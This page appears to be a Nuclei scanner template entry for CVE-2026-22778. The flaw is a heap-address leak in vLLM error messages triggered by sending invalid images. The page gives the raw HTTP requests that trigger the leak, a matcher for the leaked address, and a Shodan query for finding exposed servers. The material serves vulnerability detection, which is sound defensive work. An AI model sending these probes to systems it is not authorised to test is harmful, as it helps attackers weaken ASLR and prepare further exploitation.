vLLM 0.8.3 - 0.14.0 - Information Disclosure
CVE-2026-22778
Early Release
Description
vLLM 0.8.3 to - 0.14.1 contains an information disclosure caused by leaking a heap address in error messages from the multimodal endpoint when processing invalid images, letting remote attackers reduce ASLR entropy, exploit requires sending invalid images.
Severity
Critical
CVSS Score
9.8
Exploit Probability
4%
Affected Product
vllm
Published Date
June 21, 2026
Template Author
kenlacroix
CVE-2026-22778.yaml
id: CVE-2026-22778
info:
name: vLLM 0.8.3 - 0.14.0 - Information Disclosure
author: kenlacroix
severity: critical
description: |
vLLM 0.8.3 to - 0.14.1 contains an information disclosure caused by leaking a heap address in error messages from the multimodal endpoint when processing invalid images, letting remote attackers reduce ASLR entropy, exploit requires sending invalid images.
impact: |
Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
remediation: |
Upgrade to version 0.14.1 or later.
reference:
- https://github.com/vllm-project/vllm/security/advisories/GHSA-4r2x-xpjr-7cvv
- https://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2026-22778
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-22778
epss-score: 0.03816
epss-percentile: 0.88786
cwe-id: CWE-209
metadata:
verified: true
max-request: 2
vendor: vllm
product: vllm
shodan-query: http.html:"/v1/models" http.html:"vllm"
tags: cve,cve2026,vllm,llm,ai,disclosure,exposure,intrusive
flow: http(1) && http(2)
http:
- raw:
- |
GET /v1/models HTTP/1.1
Host: {{Hostname}}
Accept: application/json
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "\"id\":")'
condition: and
internal: true
extractors:
- type: regex
name: model
part: body
internal: true
group: 1
regex:
- '"id"\s*:\s*"([^"]+)"'
- raw:
- |
POST /v1/chat/completions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"model":"{{model}}","messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image_url","image_url":{"url":"data:image/png;base64,bm90YW5pbWFnZQ=="}}]}],"max_tokens":1}
matchers:
- type: dsl
dsl:
- 'status_code == 400'
- 'contains(body, "_io.BytesIO object at 0x")'
condition: and
# digest: 4a0a00473045022034329c4ae2e6ff293d22a8e848395bb0964e38dc4086d46e96178763c0ec0590022100ed7ff285a750093372c885fcf16af95aa69fa5530726202906b715a8e2dcd2e2:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-22778
CWE ID:
cwe-209
Remediation Steps
Upgrade to version 0.14.1 or later.